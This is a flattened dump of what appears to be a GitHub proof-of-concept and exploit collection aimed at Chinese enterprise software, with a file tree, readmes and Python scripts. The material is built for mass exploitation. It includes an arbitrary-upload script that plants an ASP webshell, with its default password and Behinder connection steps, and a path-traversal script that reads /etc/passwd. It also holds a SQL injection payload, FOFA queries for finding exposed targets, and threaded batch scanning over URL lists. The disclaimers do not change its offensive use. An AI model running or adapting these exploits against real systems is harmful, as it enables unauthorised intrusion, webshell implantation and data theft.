├── .gitattributes ├── 20231217奥威亚视屏云平台VideoCover存在前台任意文件上传 ├── assets │ ├── image-20231218141232094.png │ ├── image-20231218141232948.png │ ├── image-20231218141301264.png │ └── image-20231218141409421.png ├── poc.py ├── readme.md └── y1.asp ├── 20231218TamronOS IPTV系统后台任意文件下载 ├── assets │ ├── image-20231218203706239.png │ ├── image-20231218203720139.png │ └── image-20231218203739540.png ├── poc.py └── readme.md ├── 20231219EasyCVR 视频管理平台存在用户信息泄露 ├── assets │ ├── image-20231219105430982.png │ ├── image-20231219105512392.png │ ├── image-20231219105617309.png │ └── image-20231219105706862.png ├── poc.py └── readme.md ├── 20231220积木报表系统testConnection接口存在远程命令执行漏洞 ├── assets │ ├── image-20231220193316926.png │ └── image-20231220193335920.png └── poc.py ├── 20231221全程云OA-ajax-sql注入漏洞 ├── assets │ ├── image-20231221171330774.png │ └── image-20231221171404651.png ├── poc.py └── readme.md ├── 20231222大唐电信AC集中管理平台存在敏感信息泄漏 ├── assets │ └── image-20231222130430538.png ├── poc.py └── readme.md ├── 20231223海翔ERPgetylist_login.doSQL注入漏洞 ├── assets │ ├── image-20231223223607591.png │ ├── image-20231223223621029.png │ └── image-20231223223806747.png ├── poc.py └── readme.md ├── 20231224通达三个漏洞 ├── assets │ ├── image-20231224113959549.png │ └── image-20231224114053918.png ├── exp2.py ├── exp3.py ├── poc.py ├── poc2.py ├── poc3.py └── readme.md ├── 20231225用友NC_mxservlet反序列化漏洞 ├── assets │ ├── image-20231225211647123.png │ └── image-20231225211841367.png ├── poc.py ├── readme.md └── yongyou-nc-MxServlet-rce-exp.py ├── 20231226某运维堡垒机存在任意文件读取漏洞 ├── poc.py └── readme.md ├── 20231227wordpress_admin-ajax.php文件包含漏洞 ├── poc2.py └── readme.md ├── 20231228某电子水库安全监管平台sql注入 ├── poc.py └── readme.md ├── 20231229用友NC Cloud soapFormat接口XXE漏洞 ├── poc.md └── poc.py ├── 20231230金和-c6 gethomeinfo sql注入 ├── poc.md └── poc.py ├── 20231231海康威视-综合安防管理平台applyautologinticket 反序列化 ├── poc.py └── readme.md ├── 20240102某神SecGate3600 authManageSet.cgi信息泄露漏洞 ├── poc.py └── readme.md ├── 20240103FreeRDP存在任意文件读取漏洞 
├── poc.py └── readme.md ├── 20240104某友CRM存在任意文件读取 ├── poc.py └── readme.md ├── 20240105用友sql注入 ├── poc.py └── readme.md ├── 20240106某友CRM存在日志信息泄露 ├── assets │ ├── image-20240107234411105.png │ └── image-20240107234454131.png ├── poc.py └── readme.md ├── 20240107上海某公司防火墙信息泄露 ├── assets │ └── image-20240108000010545.png ├── poc1228.py └── readme.md ├── 20240108某r信topsec远程命令执行 ├── assets │ └── image-20240108000010545.png ├── poc.py └── readme.md ├── 20240109金蝶云星空反序列化远程代码执行漏洞 ├── assets │ └── image-20240108000010545.png ├── poc.py └── readme.md ├── 20240110用友NC_Cloud_soapFormat.ajax接口XXE漏洞 ├── assets │ └── image-20240108000010545.png ├── poc.py └── readme.md ├── 20240111先锋WEB燃气收费系统 Upload.aspx 文件上传漏洞 ├── assets │ ├── image-20240108000010545.png │ └── image-20240111204822977.png ├── poc.py └── readme.md ├── 20240112用友U8 CRM系统help2 任意文件读取漏洞 ├── assets │ └── image-20240108000010545.png ├── poc.py └── readme.md ├── 20240115金和OA C6 upload_json.asp存在任意文件上传漏洞 ├── assets │ ├── image-20240108000010545.png │ └── image-20240115225358128.png ├── poc.py └── readme.md ├── 20240118某擎rptsvr 任意文件上传 ├── assets │ ├── image-20240118193841950.png │ └── image-20240118194414299.png ├── poc.py └── readme.md ├── 20240121cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP ├── assets │ ├── image-20240121123506173.png │ ├── image-20240121123615474.png │ └── image-20240121123620660.png ├── poc.py └── readme.md ├── 20240122Hytec Inter HWL 2511 SS路由器命令执行漏洞 ├── assets │ ├── image-20240121123620660.png │ └── image-20240122222409091.png ├── poc.py └── readme.md ├── 20240126Laykefu客服系统 任意文件上传漏洞 ├── assets │ ├── image-20240121123620660.png │ └── image-20240126001223257.png ├── poc.py └── readme.md ├── 20240127万户OA text2Html 任意文件读取 ├── assets │ ├── image-20240121123620660.png │ └── image-20240127122138808.png ├── poc.py └── readme.md ├── 20240128Aria2 WebUI文件读取 ├── assets │ ├── image-20240121123620660.png │ └── image-20240127122138808.png ├── poc.py └── readme.md ├── 20240129宏景EHR view接口sql注入漏洞 ├── assets │ ├── 
image-20240121123620660.png │ └── image-20240127122138808.png ├── poc.py └── readme.md ├── 20240201用友系统-U9企业版存在任意文件上传漏洞 ├── assets │ ├── image-20240121123620660.png │ └── image-20240127122138808.png ├── poc.py └── readme.md ├── 20240202万户OA-senddocument_import.jsp任意文件上传漏洞-1 ├── assets │ ├── image-20240121123620660.png │ └── image-20240202203022822.png ├── poc.py ├── readme.md └── y1.jsp ├── 20240203亿赛通电子文档安全管理系统 uploadfiletocatalog sql注入 ├── assets │ ├── image-20240121123620660.png │ └── image-20240202203022822.png ├── poc.py └── readme.md ├── 20240205帮管客CRM 文件上传 ├── assets │ ├── image-20240121123620660.png │ └── image-20240202203022822.png ├── poc.py ├── readme.md └── y1.php ├── 20240206百为智能流控路由器RCE ├── assets │ ├── Snipaste_2024-02-07_19-04-37.png │ ├── image-20240121123620660.png │ └── image-20240202203022822.png ├── poc.py └── readme.md ├── 20240218WordPress Plugin HTML5 Video Player SQL注入漏洞 ├── assets │ └── image-20240628210919948.png ├── poc.py └── readme.md ├── 20240219用友政务A++V832产品未授权访问漏洞 ├── assets │ ├── image-20240121123620660.png │ └── image-20240202203022822.png ├── poc.py └── readme.md ├── 20240221亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载 ├── assets │ ├── image-20240121123620660.png │ └── image-20240202203022822.png ├── poc.py └── readme.md ├── 20240224用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传 ├── assets │ ├── image-20240121123620660.png │ └── image-20240202203022822.png ├── poc.py └── readme.md ├── 20240303华天动力OA8000办公系统ntkodownload.jsp存在任意文件读取漏洞 ├── assets │ ├── image-20240121123620660.png │ └── image-20240202203022822.png ├── poc.py └── readme.md ├── 20240304九思OA软件user_list_3g.jsp存在SQL注入漏洞 ├── assets │ ├── image-20240121123620660.png │ └── image-20240202203022822.png ├── poc.py └── readme.md ├── 20240307iohttp 目录遍历漏洞(CVE-2024-23334) ├── assets │ ├── image-20240121123620660.png │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240309JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198) ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 
20240310宏景某接口存在任意文件读取漏洞 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240311weiphp5.0存在远程代码执行漏洞 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240313天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240314金和OA portalwb-con-template-viewcontemplate 远程命令执行 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240318京师心智心理健康测评系统-存在敏感信息泄露 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240321用友NC runScript接口存在SQL注入-附py ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240327某友时空KSOA imagefield接口SQL注入漏洞 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240328某凌EIS智慧协同平台doc_fileedit_word.aspxSQL注入 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240331用友U8-nc.bs.sm.login2.RegisterServlet SQL注入 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240405maxView系统dynamiccontent.properties.xhtml远程代码执行漏洞 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240406万户ezOFFICE-wf_printnum.jspSQL注入漏洞 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240407畅捷通T+ KeyInfoList.aspx SQL漏洞 ├── assets │ └── Snipaste_2024-04-07_21-14-08.png ├── poc.py └── readme.md ├── 20240409用友NC Cloud importhttpscer任意文件上传 ├── assets │ └── Snipaste_2024-04-07_21-14-08.png ├── poc.py └── readme.md ├── 20240412weaver-eoffice-webservice文件上传 ├── assets │ └── Snipaste_2024-04-07_21-14-08.png ├── poc.py └── readme.md ├── 20240414用友-U8C-SQL注入-FormulaViewAction ├── assets │ └── Snipaste_2024-04-07_21-14-08.png ├── poc.py └── readme.md ├── 20240415王道汽车4S企业管理系统 SQL注入漏洞 ├── assets │ └── Snipaste_2024-04-07_21-14-08.png ├── poc.py └── readme.md ├── 20240416睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞 ├── assets │ └── Snipaste_2024-04-07_21-14-08.png ├── poc.py └── readme.md ├── 20240419jeevms 仓库管理系统 
fileread文件读取漏洞 ├── assets │ └── Snipaste_2024-04-07_21-14-08.png ├── poc.py └── readme.md └── 20240420月子会所ERP管理云平台 StarryQuoteEdit.aspx接口处存在 SQL注入漏洞 ├── assets └── Snipaste_2024-04-07_21-14-08.png ├── poc.py └── readme.md /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/assets/image-20231218141232094.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/assets/image-20231218141232094.png -------------------------------------------------------------------------------- /20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/assets/image-20231218141232948.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/assets/image-20231218141232948.png -------------------------------------------------------------------------------- /20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/assets/image-20231218141301264.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/assets/image-20231218141301264.png -------------------------------------------------------------------------------- /20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/assets/image-20231218141409421.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/assets/image-20231218141409421.png 
-------------------------------------------------------------------------------- /20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import time 3 | import requests 4 | import urllib3 5 | from rich.console import Console 6 | import argparse 7 | import re 8 | import multiprocessing 9 | from multiprocessing.dummy import Pool 10 | 11 | console = Console() 12 | def now_time(): 13 | return time.strftime("[%H:%M:%S] ", time.localtime()) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `8888 Y8a. .a88 25 | 88 88 88 Y8b 88 88 `888 `"Y88888P" 26 | 27 | 888888888888 28 | 29 | tag: this is a 奥威亚视屏云平台VideoCover前台任意文件上传 poc 30 | @version: 1.0.0 @author: Y1_K1NG 31 | """ 32 | print(test) 33 | 34 | 35 | def poc(target): 36 | if target[:4] != 'http': 37 | target = 'http://' + target 38 | if target[-1] != '/': 39 | target += '/' 40 | headers = { 41 | "Cache-Control": "no-cache", 42 | "Upgrade-Insecure-Requests": "1", 43 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 1015 7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/107.0.0.0 Safari 537.36", 44 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avifimage/webp,image/apng,*/*;q=0.8,application/signed-exchangev=b3;q=0.9", 45 | "Accept-Encoding": "gzip, deflate", 46 | "Accept-Language": "zh-CN,zh;g=0.9", 47 | "Connection": "close", 48 | "Pragma": "no-cache", 49 | # "Content-Type": "multipart/form-data; boundary=68c4ca658cd4332dc386f53710e63a10" 50 | 51 | } 52 | # data = """ 53 | # --68c4ca658cd4332dc386f53710e63a10 54 | # Content-Disposition: form-data; name="file"; 
filename="/../../../AVA.ResourcesPlatform.WebUI/y1.asp" 55 | # Content-Type: image/jpeg 56 | # 57 | # yijuhuamuma 58 | # --68c4ca658cd4332dc386f53710e63a10-- 59 | # """ 60 | files = {'file': ("y1.asp", open('y1.asp', 'rb'), 'image/jpeg')} 61 | 62 | url = target + "/Tools/Video/VideoCover.aspx" 63 | response = requests.post(url, headers=headers, files=files, verify=False, timeout=5) 64 | # print(response.request.headers) 65 | # print(response.request.body) 66 | try: 67 | response = requests.post(url, headers=headers, files=files, verify=False, timeout=5) 68 | match = re.search(r"Success", response.text) 69 | if match: 70 | if response.status_code == 200: 71 | print(f"[+]{target} is valuable") 72 | with open("result.txt", "a+", encoding="utf-8") as f: 73 | f.write(target + "y1.asp" + "\n") 74 | else: 75 | print(f"[!]{target} response code is not 200") 76 | else: 77 | print(f"[!]{target} doesn't have vulnerable") 78 | except: 79 | print(f"[*] {target} error") 80 | 81 | 82 | def main(): 83 | banner() 84 | parser = argparse.ArgumentParser(description='canal admin weak Password') 85 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: www.example.com") 86 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 87 | args = parser.parse_args() 88 | if args.url and not args.file: 89 | poc(args.url) 90 | elif not args.url and args.file: 91 | url_list = [] 92 | with open(args.file, "r", encoding="utf-8") as f: 93 | for url in f.readlines(): 94 | url_list.append(url.strip().replace("\n", "")) 95 | 96 | mp = Pool(10) # 创建一个拥有20个线程的线程池 97 | mp.map(poc, url_list) 98 | mp.close() 99 | mp.join() 100 | else: 101 | print(f"Usag:\n\t python3 {sys.argv[0]} -h") 102 | 103 | 104 | if __name__ == '__main__': 105 | main() 106 | 107 | -------------------------------------------------------------------------------- /20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/readme.md: -------------------------------------------------------------------------------- 1 | 
# fofa语法: 2 | 3 | body="/CSS/NewtonTheme/assets/app.css" 4 | 5 | 6 | 7 | # 使用 8 | 9 | 10 | 11 | python poc.py -u ip:port 12 | 13 | python poc.py -f url.txt 14 | 15 | ![image-20231218141232094](assets/image-20231218141232094.png) 16 | 17 | ![image-20231218141301264](assets/image-20231218141301264.png) 18 | 19 | webshell默认密码 y1k1ng 20 | 21 | 冰蝎连接 22 | 23 | ![image-20231218141409421](assets/image-20231218141409421.png) 24 | 25 | 由于传播、利用所发布的项目造成的任何直接或者间接的后果及损失,均由使用者本人承担。原文章作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢! 26 | 27 | -------------------------------------------------------------------------------- /20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/y1.asp: -------------------------------------------------------------------------------- 1 | <% 2 | 14 | %> -------------------------------------------------------------------------------- /20231218TamronOS IPTV系统后台任意文件下载/assets/image-20231218203706239.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231218TamronOS IPTV系统后台任意文件下载/assets/image-20231218203706239.png -------------------------------------------------------------------------------- /20231218TamronOS IPTV系统后台任意文件下载/assets/image-20231218203720139.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231218TamronOS IPTV系统后台任意文件下载/assets/image-20231218203720139.png -------------------------------------------------------------------------------- /20231218TamronOS IPTV系统后台任意文件下载/assets/image-20231218203739540.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231218TamronOS IPTV系统后台任意文件下载/assets/image-20231218203739540.png 
-------------------------------------------------------------------------------- /20231218TamronOS IPTV系统后台任意文件下载/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import time 3 | import requests 4 | import urllib3 5 | from rich.console import Console 6 | import argparse 7 | import re 8 | import multiprocessing 9 | from multiprocessing.dummy import Pool 10 | 11 | 12 | def banner(): 13 | test = """ 14 | 15 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 16 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 17 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 18 | "8aa8" 88 88,d88' 88 88 `8b 88 88 19 | `88' 88 8888"88, 88 88 `8b 88 88 88888 20 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 21 | 88 88 88 "88, 88 88 `8888 Y8a. .a88 22 | 88 88 88 Y8b 88 88 `888 `"Y88888P" 23 | 24 | 888888888888 25 | 26 | tag: this is a TamronOS IPTV系统后台任意文件下载 poc 27 | @version: 1.0.0 @author: Y1_K1NG 28 | """ 29 | print(test) 30 | 31 | 32 | def poc(target): 33 | headers = { 34 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 1015 7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/107.0.0.0 Safari 537.36", 35 | "Accept": "application/json, text/plain, */*", 36 | "Accept-Encoding": "gzip, deflate", 37 | "Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7", 38 | "Connection": "close", 39 | 40 | } 41 | 42 | url = target + "/download/backup?name=./../../../../../etc/passwd" 43 | try: 44 | response = requests.get(url, headers=headers, verify=False, timeout=5) 45 | match = re.search(r"root", response.text) 46 | if response.status_code == 200: 47 | if match: 48 | print(f"[+]{target} is valuable") 49 | with open("result.txt", "a+", encoding="utf-8") as f: 50 | f.write(target + "\n") 51 | else: 52 | print(f"[-]{target} is not echo") 53 | else: 54 | print(f"[-]{target} is not valuable") 55 | except: 56 | print(f"[*] {target} error") 57 | 58 | 59 | def main(): 60 | banner() 61 | parser = argparse.ArgumentParser(description='canal admin weak 
Password') 62 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 63 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 64 | args = parser.parse_args() 65 | if args.url and not args.file: 66 | poc(args.url) 67 | elif not args.url and args.file: 68 | url_list = [] 69 | with open(args.file, "r", encoding="utf-8") as f: 70 | for url in f.readlines(): 71 | url_list.append(url.strip().replace("\n", "")) 72 | 73 | mp = Pool(10) # 创建一个拥有20个线程的线程池 74 | mp.map(poc, url_list) 75 | mp.close() 76 | mp.join() 77 | else: 78 | print(f"Usag:\n\t python3 {sys.argv[0]} -h") 79 | 80 | 81 | if __name__ == '__main__': 82 | main() 83 | -------------------------------------------------------------------------------- /20231218TamronOS IPTV系统后台任意文件下载/readme.md: -------------------------------------------------------------------------------- 1 | ## 漏洞描述 2 | 3 | TamronOS IPTV系统存在任意文件下载 4 | 5 | ## 漏洞影响 6 | 7 | TamronOS IPTV V5 3.6.6 8 | 9 | ## FOFA 10 | 11 | title="TamronOS IPTV系统" 12 | 13 | 14 | 15 | # 使用 16 | 17 | 18 | 19 | python poc.py -u ip:port 20 | 21 | python poc.py -f url.txt 22 | 23 | ![image-20231218203706239](assets/image-20231218203706239.png) 24 | 25 | ![image-20231218203720139](assets/image-20231218203720139.png) 26 | 27 | ![image-20231218203739540](assets/image-20231218203739540.png) 28 | 29 | 30 | 31 | 由于传播、利用所发布的项目造成的任何直接或者间接的后果及损失,均由使用者本人承担。原文章作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢! 
32 | 33 | -------------------------------------------------------------------------------- /20231219EasyCVR 视频管理平台存在用户信息泄露/assets/image-20231219105430982.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231219EasyCVR 视频管理平台存在用户信息泄露/assets/image-20231219105430982.png -------------------------------------------------------------------------------- /20231219EasyCVR 视频管理平台存在用户信息泄露/assets/image-20231219105512392.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231219EasyCVR 视频管理平台存在用户信息泄露/assets/image-20231219105512392.png -------------------------------------------------------------------------------- /20231219EasyCVR 视频管理平台存在用户信息泄露/assets/image-20231219105617309.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231219EasyCVR 视频管理平台存在用户信息泄露/assets/image-20231219105617309.png -------------------------------------------------------------------------------- /20231219EasyCVR 视频管理平台存在用户信息泄露/assets/image-20231219105706862.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231219EasyCVR 视频管理平台存在用户信息泄露/assets/image-20231219105706862.png -------------------------------------------------------------------------------- /20231219EasyCVR 视频管理平台存在用户信息泄露/readme.md: -------------------------------------------------------------------------------- 1 | # EasyCVR 视频管理平台存在用户信息泄露 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | fofa语法 6 | 7 | fofa:title="EasyCVR" 8 | 9 | POC: 10 | 11 | /api/v1/userlist?pageindex=0&pagesize=10 12 | 13 | 14 | 15 | 直接GET请求即可 16 | 17 | ![image-20231219105512392](assets/image-20231219105512392.png) 18 | 19 | 批量poc(记得安装库) 20 | 21 | python poc.py -u 22 | 23 | ![image-20231219105617309](assets/image-20231219105617309.png) 24 | 25 | python poc.py -f .txt 26 | 27 | ![image-20231219105706862](assets/image-20231219105706862.png) -------------------------------------------------------------------------------- /20231220积木报表系统testConnection接口存在远程命令执行漏洞/assets/image-20231220193316926.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231220积木报表系统testConnection接口存在远程命令执行漏洞/assets/image-20231220193316926.png -------------------------------------------------------------------------------- /20231220积木报表系统testConnection接口存在远程命令执行漏洞/assets/image-20231220193335920.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231220积木报表系统testConnection接口存在远程命令执行漏洞/assets/image-20231220193335920.png -------------------------------------------------------------------------------- /20231221全程云OA-ajax-sql注入漏洞/assets/image-20231221171330774.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231221全程云OA-ajax-sql注入漏洞/assets/image-20231221171330774.png -------------------------------------------------------------------------------- /20231221全程云OA-ajax-sql注入漏洞/assets/image-20231221171404651.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231221全程云OA-ajax-sql注入漏洞/assets/image-20231221171404651.png -------------------------------------------------------------------------------- /20231221全程云OA-ajax-sql注入漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # oday-全程云OA-ajax-sql注入漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | oday-全程云OA-ajax-sql注入漏洞 6 | 7 | 直接post请求即可 8 | 9 | poc 以及批量脚本已经上传圈子(补充:0day poc圈子当天公布,github推迟两天公布) 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | ![image-20231221171404651](assets/image-20231221171404651.png) 16 | 17 | python poc.py -f .txt 18 | 19 | ![image-20231221171330774](assets/image-20231221171330774.png) 20 | 21 | 批量脚本获取 22 | 23 | https://pc.fenchuan8.com/#/index?forum=62709&yqm=M1R3 24 | 25 | ![image-20231221173222581](C:/Users/11464/AppData/Roaming/Typora/typora-user-images/image-20231221173222581.png) 26 | 27 | ![image-20231221173209225](C:/Users/11464/AppData/Roaming/Typora/typora-user-images/image-20231221173209225.png) -------------------------------------------------------------------------------- /20231222大唐电信AC集中管理平台存在敏感信息泄漏/assets/image-20231222130430538.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231222大唐电信AC集中管理平台存在敏感信息泄漏/assets/image-20231222130430538.png -------------------------------------------------------------------------------- /20231222大唐电信AC集中管理平台存在敏感信息泄漏/readme.md: -------------------------------------------------------------------------------- 1 | # 大唐电信AC集中管理平台存在敏感信息泄漏漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | fofa语法 6 | 7 | app="大唐电信AC集中管理平台" && fid="gmqJFLGz7L/7TdQxUJFBXQ==" 8 | 9 | ## 漏洞复现 10 | 11 | POC: 12 | 13 | **GET** /actpt.data HTTP/1.1 14 | 15 | **Host:** 16 | 17 | **User-Agent:** Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 18 | 19 | **Accept:** text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 20 | 21 | Connection: Keep-Alive 22 | 23 | Pragma: no-cache 24 | 25 | Cache-Control: no-cache 26 | 27 | Upgrade-Insecure-Requests: 1 28 | 29 | **Accept-Encoding:** gzip, deflate 30 | 31 | **Accept-Language:** zh-CN,zh;q=0.9 32 | 33 | 直接GET请求即可 34 | 35 | 36 | 37 | 批量poc(记得安装库) 38 | 39 | python poc.py -u 40 | 41 | 42 | 43 | python poc.py -f .txt 44 | 45 | ![image-20231222130430538](assets/image-20231222130430538.png) -------------------------------------------------------------------------------- /20231223海翔ERPgetylist_login.doSQL注入漏洞/assets/image-20231223223607591.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231223海翔ERPgetylist_login.doSQL注入漏洞/assets/image-20231223223607591.png -------------------------------------------------------------------------------- /20231223海翔ERPgetylist_login.doSQL注入漏洞/assets/image-20231223223621029.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231223海翔ERPgetylist_login.doSQL注入漏洞/assets/image-20231223223621029.png -------------------------------------------------------------------------------- /20231223海翔ERPgetylist_login.doSQL注入漏洞/assets/image-20231223223806747.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231223海翔ERPgetylist_login.doSQL注入漏洞/assets/image-20231223223806747.png -------------------------------------------------------------------------------- /20231223海翔ERPgetylist_login.doSQL注入漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 海翔ERP getylist_login.do SQL注入漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa语法 6 | 7 | ***\*body="checkMacWaitingSecond"\**** 8 | 9 | POC: 10 | 11 | POST /getylist_login.do HTTP/1.1 12 | 13 | Host: 14 | 15 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 16 | 17 | Connection: close 18 | 19 | Content-Length: 77 20 | 21 | Accept-Encoding: gzip 22 | 23 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 24 | 25 | 26 | 27 | accountname=test' and (updatexml(1,concat(0x7e,(select md5(123)),0x7e),1));-- 28 | 29 | 30 | 31 | ![image-20231223223607591](assets/image-20231223223607591.png) 32 | 33 | 34 | 35 | 批量poc(记得安装库) 36 | 37 | python poc.py -u 38 | 39 | 40 | 41 | python poc.py -f .txt 42 | 43 | ![image-20231223223806747](assets/image-20231223223806747.png) -------------------------------------------------------------------------------- /20231224通达三个漏洞/assets/image-20231224113959549.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231224通达三个漏洞/assets/image-20231224113959549.png -------------------------------------------------------------------------------- /20231224通达三个漏洞/assets/image-20231224114053918.png: -------------------------------------------------------------------------------- 
